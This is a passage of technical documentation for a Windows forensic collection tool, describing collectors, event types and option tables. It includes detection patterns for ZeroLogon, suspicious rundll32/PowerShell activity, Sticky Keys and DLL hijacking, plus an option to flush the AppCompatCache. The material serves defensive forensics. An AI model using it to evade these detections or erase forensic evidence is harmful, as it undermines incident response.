Option	Value
Custom Log Name	`%windir%\System32\Winevt\Logs\Windows Powershell.evtx`
Filter Expression	`(EVENTID==400 or EVENTID==403 or EVENTID==600) AND ('rundll32' in TEXT OR 'powershell' in TEXT)`
Help Tag	`PowerShell`

FeatureUsage

Collects data from Windows 10 and 11 Feature Usage registry keys.

Events generated

RegFeatureUsageInfo: Information about Feature Usage registry keys contains details per user and last login/last write timestamps. This is collected alongside Dirlist-related events.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No
Process Files Modified Within Days	Integer	Only process files modified within a specified number of days.	No
Process Offline Registry	Boolean	Process offline registry files in addition to live registry.	No
Do Not Process Live Registry	Boolean	Process offline registry files in addition to live registry.	No
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Files

Collects counts of attribute types, file size distribution, and distributions of timestamp ages.

Events generated

FilesStatisticInfo: Contains information about a file’s statistics. It’s a much less noisy version of Dirlist events and meant to give complementary information.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty.	Yes. %systemdrive%
Scan All Drives	Boolean	Enables scanning of all available drives.	Yes
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No. Collector defaults to .
Maximum Extensions	Integer	Maximum number of file extensions to process.	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Recursive Listing	Boolean	Enables recursive directory scanning.	Yes
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	Yes
Calculate Raw Extension Statistics	Boolean	Generates statistics for raw file extensions.	Yes
Calculate Filtered Extension Statistics	Boolean	Generates statistics for filtered file extensions.	No

Firewall

Collects Windows host-based firewall rules and their configurations including enabled/disabled status, application names, protocols, ports, and network profiles.

Events generated

FirewallRuleInfo: Contains information about firewall rules created on the host.

Configurable options

Option	Type	Description	In default configuration?
Only Report Disabled Rules	Boolean	Only report firewall rules that are disabled.	No
Only Report Enabled Rules	Boolean	Only report firewall rules that are enabled.	No

Groups

Collect information about Windows user groups and their members from the local system.

Events generated

LocalGroupIdentity: Group identity information includes user group name, GID, names, UIDs, and SID of user members.

Configurable options

None

Handles

Collects handle IDs, types, and names of running processes.

Events generated

ProcessHandleTableEntry: Information about an entry in the process handle table that references a kernel object.

Configurable options

Option

Type

Description

In default configuration?

Don't report entries that have an empty name

Boolean

Excludes handles with empty names from the collection.

Yes

Process ID

Integer

Filter collection to a specific process ID number.

Type

String

Filter collection by handle type. For example: mutant, file, key.

Yes.

mutant

SignInfo: Information about the signing state of an image.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty.	Yes. %SystemDrive%
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
LNK Target File Operations	Multiple selection	Link the file operations to include in this collection.	Yes. fileid
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No
Scan All Drives	Boolean	Enables scanning of all available drives.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
Recursive Listing	Boolean	Enables recursive directory scanning.	Yes
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	15
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	Yes. 5MB
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

LogFile

Collects data from text log files. Default configuration has multiple different collectors.

Events generated

FileEntry: Text version of warning and error events.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty.	Yes. Multiple options, see Default configuration examples.
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	Yes. Multiple options, see Default configuration examples.
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
Recursive Listing	Boolean	Enables recursive directory scanning.	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Days to include	Integer	Number of days of log data to collect	No
First Lines	Integer	Number of lines to collect from the beginning of each file	No
Line Inclusion Regex	String	Regular expression pattern for filtering log lines.	No
Format String	String	Use $[1-9] to reference match groups, #[1-9] for SHA256 hash, *[1-9] for masking	No
Help Tag	String	Helper tag, can help tag specific logs you're looking for	No
Maximum Entries	Integer	Maximum number of entries to collect. . Default: unlimited	No

Default configuration examples

ZeroLogon detection

Option	Value
Path	`%SystemRoot%\debug\`
File Mask	`netlogon.*`
Include Filter	`\.(log\|bak)`
Line Inclusion Regex	`NetrServerAuthenticate.*212fffff`
Help Tag	`ZeroLogon`

Windows defender detection logs

Option	Value
Path	`%ProgramData%\Microsoft\Windows Defender\Support\`
File Mask	`MPDetection-*.log`
Line Inclusion Regex	`DETECTION`
Help Tag	`AV`

Option	Value
Path	`%ProgramData%\Microsoft\Windows Defender\Support\`
File Mask	`MPLog-*.log`
Line Inclusion Regex	`DETECTION(_\|\w\|:)`
Help Tag	`AV`

PowerShell history

Option	Value
Path	`%profiles%`
Include Filter	`\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\`
File Mask	`ConsoleHost_history.txt`
Recursive Listing	`True`
Disable Symbolic Links	`True`
Recursion Depth	`20`
Help Tag	`PowerShell`

Magic

Collects information about files within the file system that have fake extensions, such as a DOIUV file extension, but the byte signature belongs to a PE extension.

Events generated

FileSignatureMismatch: On-demand scan for files with name extensions and header magic values.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty.	Yes. %SystemDrive
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Scan All Drives	Boolean	Enables scanning of all available drives.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
File Mask	String	Specify which files to include in the collection, using wildcards. For example, .exe, log.txt.	No
Recursive Listing	Boolean	Enables recursive directory scanning.	Yes
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	15
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	Yes
Short Name	Boolean	Use short filename version of file extension.	No
Max Count	Integer	Don't report if file signature count is less than max.	No. Collector default is 32
Include Unknown	Boolean	Include unknown and unrecognized signatures.	No
Only PE	Boolean	Only process Portable Executable (PE) files.	Yes
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	Yes. 20MB
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Mal

Collects malicious evidence related to Sticky Keys and DLL Hijacking.

Events generated

MalPaths: Malicious DLL or executable image name conflicts found in different or unexpected folders.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	Yes. %SystemDrive%
Actions	String	Specific actions to scan for.	Yes. dllsvchost, dllinpath, sticky, masquerade
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	Yes. 15

MFT

Collects data from deleted file records from the Windows Master File Table (MFT).

Events generated

MftBootSector: Windows Master File Table (MFT) Boot sector.

MftRecord: Windows Master File Table (MFT) record.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	Yes. %SystemDrive%
Scan All Drives	Boolean	Enables scanning of all available drives.	No
Before Days	Integer	Number of days to look back for file records.	Yes. 365
Find Deleted Files	Boolean	Include deleted file records in collection.	Yes
Find In-Use Files	Boolean	Include currently active file records in collection.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt)	No. Collector defaults to .
Maximum Entries	Integer	Maximum number of entries to collect. .	No. Collector defaults to Unlimited.
Start Record	Integer	Start at `<number>` MFT record.	No
Display MAC Times	Boolean	Show Modified, Accessed, and Created timestamps.	Yes
Exclude Zero Size Files	Boolean	Skip files with a byte size of zero.	No

Network

Collect comprehensive network configuration and connection information including interfaces, DNS, routing, and active connections.

Events generated

IPv4:

LocalIpAddressIP4: IPv4 Address on the machine. NetworkListenIP4 - IPv4 Network listen event.
NetworkCloseIP4: IPv4 network close event.
NetworkConnectIP4: IPv4 network connect event.
NetworkReceiveAcceptIP4: IPv4 network SYN event.
NetworkStatisticsIP4: Running IPv4 protocol statistics on a host.
NetworkStatisticsTCP4: Running TCP/IPv4 protocol statistics on a host.
NetworkStatisticsUDP4: Running UDP/IPv4 protocol statistics on a host.
RouteIP4: IPv4 Route entry.

IPv6:

LocalIpAddressIP6: IPv6 Address on the machine.
NetworkCloseIP6: IPv6 network close event.
NetworkConnectIP6: IPv6 network connect event.
NetworkListenIP6: IPv6 Network listen event.
NetworkReceiveAcceptIP6: IPv6 network SYN event.
NetworkStatisticsIP6: Running IPv6 protocol statistics on a host.
NetworkStatisticsTCP6: Running TCP/IPv6 protocol statistics on a host.
NetworkStatisticsUDP6: Running UDP/IPv6 protocol statistics on a host.
RouteIP6: IPv6 Route entry.

DNS:

DnsCache: DNS cache entry.
DnsServer: DNS server IP addresses.
NetworkDnsSuffix: A network suffix name in the configured DNS suffix list.

ARP:

Host File:
NeighborListIP4: An entry in the ARP table.
NeighborListIP6: An entry in the ARP table.
NetworkHostsFileEntry: A hostname entry in the network hosts file.

Configurable options

None

PCA

Collects data from the Windows 11 Pro (22H2) Program Compatibility Assistant (PCA) artifacts.

Events generated

PcaAppLaunchEntry: An application launch entry in windows Program Compatibility Assistant (PCA) file PcaAppLaunchDic.txt.

PcaGeneralDbEntry: An application launch entry in Windows Program Compatibility Assistant (PCA) database PcaGeneralDb[0-9]+.txt.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	Yes. %SystemRoot%\appcompat\pca
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	Yes. Pca*.txt
Line Inclusion Regex	String	Regular expression pattern for filtering log lines.	No
Maximum Entries	Integer	Maximum number of entries to collect. Default: unlimited	No
Process Last Lines	Integer	Only process the last specified number of lines of each log file.	No
First Lines	Integer	Number of lines to collect from the beginning of each file.	No
File Operations	Multiple selection	The file operations to include in this collection.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

PEInfo

Collects Portable Executable (PE) header information and file metadata. Default has multiple PEInfo collectors, one is for .exe files the other is for running processes.

Events generated

PeHeaderInfo: Portable Executable header information from a Windows executable.

PeHeaderOptionalInfo: Portable Executable optional header information from a Windows executable.

PeSectionInfo: Windows Portable Executable (PE) section information.

Configurable options

Option	Type	Description	In default configuration?
PE Source	Selection	Must select Analyze Running Processes or Path	No
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Perform Anomaly Detection	Boolean	Detect anomalies in PE files.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
Include Filter	String	Regular expression pattern for including paths.	No
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	For .exe collector mask is .exe, running config no mask, default is .*
Don't dump function names	Boolean	When obtaining PE file information, don't dump function names for imports and exports.	Yes for exe collector
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	Yes. 15 for exe collector
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Recursive Listing	Boolean	Enables recursive directory scanning.	Yes. for exe collector
Don't dump resource information	Boolean	When obtaining PE file information, don't dump full resource information.	Yes. for exe collector
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Help Tag	String	Help tag that describes the event filter.	Yes. running for running collector
Avoidance Filter	String	Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection.	No

Configurable options

Option

Type

Description

In default configuration?

File Operations

Multiple selection

The file operations to include in this collection.

Yes.

attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse, mft, indx

Skip Hashing Above Size

String

Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.

Yes.

20MB

Skip Hashing Below Size

String

Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.

Recycle

Collects file name and metadata of deleted files in the recycle bin.

Events generated

FileDeleted: File entry and details in the Recycle Bin.

Configurable options

Option	Type	Description	In default configuration?
Path	String	Environment and app variables are automatically expanded. Default: '%SystemDrive%$Recycle.Bin'	Yes
Include Filter	String	Regular expression pattern for including paths.	No
Exclude Filter	String	Regular expression pattern for excluding paths.	No
File Mask	String	Specify which files to include in the collection, using wildcards. Default: $I.	Yes

RegDump

Collects metadata from registry hives. Default configuration has multiple collectors, see table below for default regdump collectors. See table below for all registry keys gathered by default collector. All collections have an 8 kilobyte max limit.

Events generated

RegGenericInfo: Generic information about a registry entry.

Configurable options

Option	Type	Description	In default configuration?
Registry key	String	Specify a registry key path to start dump from. Supports short-hand versions like 'hklm', 'hkcu'.	No
Key Date	Date	Only process entries with write time on or after date.	No
Output FILETIME Timestamp	Boolean	Output additional FILETIME timestamp version of binary data.	No
Key Days	Integer	Only process entries with write time within the last n days.	No
Hive File	String	Process raw registry hive file directly, input path to hive file.	No
Process Files Modified Within Days	Integer	Only process offline registry files modified within the specified number of days.	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Disable Symbolic Links	Boolean	Disable following directory symbolic links.	No
Recursive Listing	Boolean	Enable recursive directory traversal.	No
Help Tag	String	Help tag that describes the event filter.	No
Ignore Empty	Boolean	Don't output details of empty keys.	No
Key Name Filter	String	Regular expression to filter registry key names.	No
Max Bytes	String	The max byte count for REG_BINARY.	Yes. 8KB
Value Name Filter	String	Regular expression to filter registry value names.	No
Wide Text	Boolean	Output additional wide character text version of binary data.	No
Process Offline NTUSER.DAT Files	Boolean	Process offline NTUSER.DAT files for all users.	No
Remote	Boolean	Connect to remote registry.	No
ASCII Text	Boolean	Output additional ASCII text version of binary data.	No
Data Filter	String	Value data (REG_SZ) regular expression.	No
ROT13	Boolean	Decode value names using ROT13 for REG_BINARY types.	No
Value Types	String	List of data value types to process. This is a dropdown selection.	No

Default configuration examples

All configurations include the following.

ASCII Text
Max Bytes: 8KB
Recursive Listing
Wide Text

HKLM registry keys

HKLM\SOFTWARE\Microsoft

Key filter:

^SOFTWARE\Microsoft\Windows( NT)(?!CurrentVersion\SideBySide|CurrentVersion\Component Based Servicing|CurrentVersion\Installer|CurrentVersion\Appmodel|CurrentVersion\Winevt|CurrentVersion\Perflib)

HKLM\SOFTWARE\Wow6432Node\Microsoft

Key filter:

^SOFTWARE\Wow6432Node\Microsoft\Windows( NT)(?!CurrentVersion\SideBySide|CurrentVersion\Component Based Servicing|CurrentVersion\Installer|CurrentVersion\Appmodel|CurrentVersion\Winevt|CurrentVersion\Perflib)

HKLM\SOFTWARE\Classes\Local Settings\Software\Microsoft
HKLM\SECURITY\Policy

HKLM\SYSTEM\CurrentControlSet\Control

Key filter:

^SYSTEM\CurrentControlSet\Control(?!WMI|Class|Notifications|NetDiagFX|Power).*

HKLM\SYSTEM\CurrentControlSet\Services
HKLM\SOFTWARE\Microsoft\Windows\currentversion\run
HKLM\SOFTWARE\Microsoft\Windows\currentversion\runonce

HKAU registry keys - Microsoft related

All HKAU configurations include Process Offline NTUSER.DAT Files.

HKAU\SOFTWARE\Microsoft
HKAU\SOFTWARE\Classes\Local Settings\Software\Microsoft
HKAU\SOFTWARE\Wow6432Node\Microsoft
HKAU\Software\AppDataLow\Software\Microsoft
HKAU\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKAU registry keys - Browser related

HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs
HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsTime
HKAU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsVisitCount

HKAU registry keys - File management tools

HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Bookmarks
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\CDCache
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\History
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Interface\Explorer
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\LastFingerprints
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\LifetimeCounters
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\Configuration\Usage\PeriodCounters
HKAU\SOFTWARE\Martin Prikryl\WinSCP 2\SshHostKeys
HKAU\Software\FileZillaPo\PuTTY\SshHostKeys
HKAU\Software\SimonTatham\PuTTY
HKAU\Software\7-Zip
HKAU\Software\Wow6432Node\7-Zip
HKAU\Software\Nico Mak Computing\WinZip
HKAU\SOFTWARE\WinRAR\DialogEditHistory
HKAU\Software\WinRAR\ArcHistory

HKAU registry keys - System management

HKAU\SOFTWARE\LANDesk\Inventory\LogonHistory\Logons
HKAU\SOFTWARE\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog
HKAU\SOFTWARE\Wow6432Node\LANDesk\Inventory\LogonHistory\Logons
HKAU\SOFTWARE\Wow6432Node\LANDesk\ManagementSuite\WinClient\SoftwareMonitoring\MonitorLog
HKAU\Software\ATERA Networks\AlphaAgent\
HKAU\SOFTWARE\Sysinternals

HKAU registry keys - Shell extensions

HKAU\SOFTWARE\Classes*\shellex

RegFile

Collects metadata from references to files in registry strings. Default configuration has multiple configurations applied to it. Including if it is in the default configuration will not be done outside of file operations as these are all the same.

Events generated

RegGenericInfo: Generic information about a registry entry.

Configurable options

Option	Type	Description	In default configuration?
Registry key	String	Specify a registry key path to start dump from. Supports short-hand versions like ‘hklm’, ‘hkcu’.	No
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Key Name Filter	String	Regular expression pattern for filtering key names.	No
Value Name Filter	String	Regular expression pattern for filtering value names.	No
Process Files Modified Within Days	Integer	Only process offline registry files modified within the specified number of days.	No
Recursive Listing	Boolean	Enables recursive directory scanning.	No
Recursion Depth	Integer	Integer denotes recursion depth. For example: 0 = top level only 1 = 1 level down 2 = 2 levels down	No
Disable Symbolic Links	Boolean	Prevents following symbolic links during collection.	No
Process Offline NTUSER.DAT Files	Boolean	Process offline NTUSER.DAT files for all users.	No
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Default configuration examples

Unless otherwise specified, all configurations include the following.

File Operations: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Recursive listing
Skip Hashing Above Size: 20MB

HKLM registry keys

Registry key	Key filter
HKLM\SOFTWARE\Microsoft	^SOFTWARE\Microsoft\Windows( NT)*\(?!CurrentVersion\SideBySide
HKLM\SOFTWARE\Wow6432Node\Microsoft	^SOFTWARE\Wow6432Node\Microsoft\Windows( NT)*\(?!CurrentVersion\SideBySide
HKLM\Software\Classes\Local Settings\Software\Microsoft	none

HKAU registry keys

Registry key	Key filter
HKAU\SOFTWARE\Microsoft	^SOFTWARE\Microsoft\Windows( NT)*
HKAU\SOFTWARE\Wow6432Node\Microsoft	^SOFTWARE\Wow6432Node\Microsoft\Windows( NT)*
HKAU\Software\Classes\Local Settings\Software\Microsoft	none

SDB

Collects metadata from Application Compatibility Shim Database (SDB) files.

Events generated

ShimDbTag: Tag entry in the Shim Database.

Configurable options

Option

Type

Description

In default configuration?

SDB Path

String

Parse single shim database file directly. No registry searching. Environment and app variables are automatically expanded.

File Operations

Multiple selection

The file operations to include in this collection.

Yes.

attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

Services

Collects metadata from running services.

Events generated

ServicesStatusInfo: Detailed information and status of a windows service.

Configurable options

Option	Type	Description	In default configuration?
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Service Name Mask	String	Only process services matching wildcard mask.	No
Process svchost DLLs	Boolean	Process and display svchost DLL entries.	Yes
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	Yes. 20MB
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Collect information about Windows network shares including share names, types, paths, and permissions.

Events generated

NetShareInfo: Information about a shared resource.

Configurable options

None

ShellBag

Collects metadata from Registry Shell Bags.

Events generated

ShellBagInfo: Windows ShellBag MRU registry entry.

ShellBagFileTimestampMetadata: An event is emitted per timestamp from a ShellBag registry entry.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No
Process Files Modified Within Days	Integer	Only process offline registry files modified within the specified number of days.	No
Process Offline Registry Files	Boolean	Enable processing of offline registry files.	Yes
Do Not Process Live Registry	Boolean	Only process offline registry files, not live registry files.	No

Shim

Collects Application Compatibility (Shim) Cache metadata.

Events generated

RegShimCache: Shim cache registry entry.

Configurable options

Option	Type	Description	In default configuration?
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	Yes. 20MB
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Flush AppCompatCache	Boolean	Flush (clear from registry) AppCompatCache upon completion.	No

SRUM

Collects System Resource Usage Management (SRUM) database parser metadata.

Events generated

SruApplicationResourceUsage: System Resource Utilization Monitor: application resource usage per user.

SruNetworkDataUsage: System Resource Utilization Monitor: bytes sent/received per local network interface, application and user tuple.

SruApplicationTimelineProvider: System Resource Utilization Monitor: application resource usage timeline.

SruNetworkConnectivityUsage: System Resource Utilization Monitor: connection time per local network interface, application, and user tuple.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No. collector default is %SystemRoot%\System32\sru
File Operations	Multiple selection	The file operations to include in this collection.	No
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	No. collector default is SRUDB.dat
Use Full Row Mode	Boolean	Use full row mode rather than generic column/name/value mode.	Yes
Exclude Empty Values	Boolean	Exclude empty values to reduce output size.	Yes
Tables To Process	Multiple selection	Select which tables to process from the SRUM database.	No

StartupInfo

Collects Microsoft Windows StartupInfo XML files metadata.

Events generated

AutoRunProcessInfo: Describes a process that was automatically executed.

Configurable options

Option

Type

Description

In default configuration?

Path

String

The directory path to scan. Environment and app variables are automatically expanded.

Artifact File Operations

Multiple selection

File operations for artifact XML file.

Yes.

attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

Process File Operations

Multiple selection

File operations for process entry executable.

Yes.

attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

SuperFetch

Collects metadata from the AgAppLaunch SuperFetch database file.

Events generated

SuperfetchAppInfo: Application entry from Windows Superfetch AgForegroundAppHistory.db.

SuperfetchAppSchedule: Application running schedule/period recently updated from Windows Superfetch AgGlobalHistory.db.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No
Treat Files As 32-bit OS	Boolean	Treat files as if they came from a 32-bit operating system.	No
Treat Files As 64-bit OS	Boolean	Treat files as if they came from a 64-bit operating system.	No
Recursive Listing	Boolean	Enable recursive directory traversal.	No
Translate Paths	Boolean	Translate `\\dev\\harddiskvolume` paths to logical drive path.	Yes

Syscache

Collects metadata from Syscache.hve.

Events generated

SyscacheEntry: Information about an entry in the Windows Syscache hive.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	Yes
File Operations	Multiple selection	The file operations to include in this collection.	Yes. attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Skip Hashing Above Size	String	Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No
Skip Hashing Below Size	String	Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB.	No

Tasks

Collect information about Windows scheduled tasks including execution details, triggers, and configuration settings.

Events generated

ScheduledTaskInfo: Scheduled Windows tasks.

Configurable options

None

Timeline

Collects Windows 10 Timeline activity history including timestamps, executables, and file access records from ActivitiesCache.db.

Events generated

WindowsTimelineEntry: An entry in the ActivitiesCache.db

WindowsTimelineEntryTimestamp: Timestamps for the Entries in WindowsTimelineEntry

Configurable options

Option	Type	Description	In default configuration?
Ascending order	Boolean	Sort results chronologically. Default: Descending	No
Copy database	Boolean	Make a temporary copy if database is in use	Yes
After Date	Date	Report events generated on or after this UTC date	No
Maximum Entries	Integer	Maximum number of entries to collect	Yes, 1000
Days to include	Integer	Only collect records generated within the specified number of recent days	No

UAL

Collects metadata from the "CLIENTS" table of the User Access Logging (UAL) Extensible Storage Engine (ESE) or JET database on server systems.

Events generated

UserAccessLogEntry: Per-user access log information for the year for a service role and IP address pair on Windows servers.

Configurable options

Option	Type	Description	In default configuration?
Path	String	The directory path to scan. Environment and app variables are automatically expanded.	No. Collector defaults to %SystemRoot%\System32\LogFiles\sum
File Mask	String	Specify which files to include using wildcards. For example, .exe, log.txt.	No. Collector defaults to *.mdb
Use Full Row Mode	Boolean	Use full row mode rather than generic column/name/value mode	Yes
File Operations	Multiple selection	The file operations to include in this collection.	No

USN reason bit mask values

These values can be combined. For example: 0x00000034 or 0x34 can be expressed as 52 to describe USN_REASON_DATA_TRUNCATION, USN_REASON_NAMED_DATA_OVERWRITE and USN_REASON_NAMED_DATA_EXTEND.

Reason	Value
USN_REASON_DATA_OVERWRITE	0x00000001
USN_REASON_DATA_EXTEND	0x00000002
USN_REASON_DATA_TRUNCATION	0x00000004
USN_REASON_NAMED_DATA_OVERWRITE	0x00000010
USN_REASON_NAMED_DATA_EXTEND	0x00000020
USN_REASON_NAMED_DATA_TRUNCATION	0x00000040
USN_REASON_FILE_CREATE	0x00000100
USN_REASON_FILE_DELETE	0x00000200
USN_REASON_EA_CHANGE	0x00000400
USN_REASON_SECURITY_CHANGE	0x00000800
USN_REASON_RENAME_OLD_NAME	0x00001000
USN_REASON_RENAME_NEW_NAME	0x00002000
USN_REASON_INDEXABLE_CHANGE	0x00004000
USN_REASON_BASIC_INFO_CHANGE	0x00008000
USN_REASON_HARD_LINK_CHANGE	0x00010000
USN_REASON_COMPRESSION_CHANGE	0x00020000
USN_REASON_ENCRYPTION_CHANGE	0x00040000
USN_REASON_OBJECT_ID_CHANGE	0x00080000
USN_REASON_REPARSE_POINT_CHANGE	0x00100000
USN_REASON_STREAM_CHANGE	0x00200000
USN_REASON_TRANSACTED_CHANGE	0x00400000
USN_REASON_INTEGRITY_CHANGE	0x00800000
USN_REASON_DESIRED_STORAGE_CLASS_CHANGE	0x01000000
USN_REASON_CLOSE	0x80000000

VSS

